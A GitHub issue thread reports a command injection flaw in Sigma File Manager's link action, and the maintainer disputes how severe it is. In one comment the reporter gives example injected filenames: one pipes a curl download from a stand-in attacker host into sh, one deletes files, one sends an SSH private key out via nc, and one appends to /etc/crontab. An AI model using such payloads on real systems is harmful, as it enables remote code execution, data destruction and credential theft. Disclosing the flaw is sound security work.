Command Injection in MAKE_DIR_ITEM_LINK Action (RCE)

[pescada-dev]

A command injection vulnerability in Sigma File Manager versions 1.0.0 through 1.7.0 allows local attackers to execute arbitrary shell commands with the privileges of the application process. The issue resides in the MAKE_DIR_ITEM_LINK action in src/store.js, where user-controlled file paths (e.g., srcPath from selected directory items) are passed to fsManager.getCommand without sanitization and executed via childProcess.spawn with sh on Linux or powershell on Windows. This enables malicious commands to be executed by crafting file paths with shell metacharacters.

Details:

• Affected Versions: 1.0.0–1.7.0
• Component: src/store.js,in ligne :4853 MAKE_DIR_ITEM_LINK action, fsManager.getCommand function
• Impact: Arbitrary code execution (CWE-78: OS Command Injection)
• CVSS v3.1: 7.8 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
• Status: Reported to MITRE for CVE

I can share further details privately via email (anasshopme@gmail.com). Recommended mitigations include using Node.js fs.symlink or sanitizing paths with shell-escape.
@Alixey @alexhx5 @OfficialEsco @JakobDev

[aleksey-hoffman]

Is that an AI generated issue, mate? 😄
If you have a local attacker, don't you think they can run any commands they want directly in your terminal?

[pescada-dev]

@aleksey-hoffman
don’t act like a genius. That’s my expertise—if you have a doubt, just ask me kindly so i can explain to you.

no AI here I found this bug by digging through src/store.js (line 4853 MAKE_DIR_ITEM_LINK) myself! I get the “local attacker can use a terminal” point but this vuln is sneakier and way worse Here’s why it’s a big deal

Why It’s Serious
This isn’t just about terminal access A local attacker can do real damage through the app’s UI without touching a terminal

Shared Systems: Think university labs or work PCs A low-priv user drops a file named doc.txt;curl http://attacker.com/malware|sh in a shared folder Someone uses Sigma File Manager to make a link BAM malware runs as that user stealing data or worse

Tricking Users: Attackers can email files with names like report.pdf;rm -rf ~/Docs A user right-clicks to link it in your app and their files are gone No terminal needed

Stealth: Security tools watch terminals but might miss commands run through your app’s childProcess.spawn An attacker could run cat ~/.ssh/id_rsa | nc attacker.com 4444 and steal keys quietly

Persistence: A file like test.txt;echo 'backdoor' >> /etc/crontab sets up a cron job for ongoing attacks especially in CI/CD setups

go check mittre cve there is also local cve has been assigned dont worry bro i got you

[aleksey-hoffman]

Well, if it's not AI, I appreciate your concern, mate. I agree that you should sanitize commands where appropriate. That's what I'm gonna do in v2

But I will keep this closed for now, unless someone shows me a video of a realistic scenario, where you create a link from a file named "file.pdf;bad-command" using SFM and then run a terminal command by opening it

[pescada-dev]

Thanks for your reply. I will prepare a lab to prove that. It will take me a week because of my work, but I will send you the video to your email.😄

[aleksey-hoffman]

Please mate don't spend a week of your time on this 😄unless it's your hobby and you are having fun doing this
The SFM v1.x is kind of legacy now anyway. It will probably work completely different in v2. Don't waste too much time on this

[pescada-dev]

@aleksey-hoffman Nah, it’s really a hobby, and I really want to level up my code reviewing and security skills, so I pick open-source projects and manually search for vulnerabilities cause im just just junior offensive security and i want to level up and write something new on my cv hahah